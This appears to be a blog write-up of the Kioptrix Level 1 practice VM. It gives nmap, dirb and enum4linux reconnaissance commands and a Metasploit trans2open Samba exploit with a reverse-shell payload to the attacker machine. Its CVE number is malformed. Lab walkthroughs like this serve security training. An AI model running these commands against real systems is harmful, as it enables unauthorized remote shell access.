Kioptrix Level 1 – Write Up

In this blog, we’re going walkthrough how to get root shell on Kioptrix Level 1 VM. First things first, after downloading/importing VM, make sure that its network settings set to host-only as well as; your Kali box. without further ado, let’s get right to it.

Fire up nmap and kick-off an intensive scan

nmap -sT -A -T4 -p- -v 192.168.68.141 -oN /root/Desktop/nmap_results.txt
nmap -sT -A -T4 -p- -v 192.168.68.141 -oN /root/Desktop/nmap_results.txt

Looks like its running apache test webpage on port 80 & 443, ssh on port 22, NetBIOS-ssn on port 139, and rpcbind on port 111

Fire up dirb and see if we can get anything interesting

dirb http://192.168.68.141/ /usr/share/wordlists/dirb/common.txt
dirb http://192.168.68.141/ /usr/share/wordlists/dirb/common.txt

Well, turns out there is nothing useful on the webpage.

Tried to look for any mountable shares with no luck, but then I threw enum4linux at it and got bunch of interesting information. The one that stuck out for me was VM is using Samba 2.2.1a which I know for a fact there is metasploit module for it (CVE-2003-201).

info exploit/linux/samba/trans2open
info exploit/linux/samba/trans2open

Fire up metasploit and use samba exploit

use /exploit/linux/samba/trans2open set RHOST kioptrix set LHOST kali set LPORT 4545 set PAYLOAD generic/shell_reverse_tcp exploit uname -a id
use /exploit/linux/samba/trans2open
set RHOST kioptrix
set LHOST kali
set LPORT 4545
set PAYLOAD generic/shell_reverse_tcp
exploit
uname -a
id

Bingo!

Happy hunting!

Leave a Reply

Your email address will not be published. Required fields are marked *

CAPTCHA *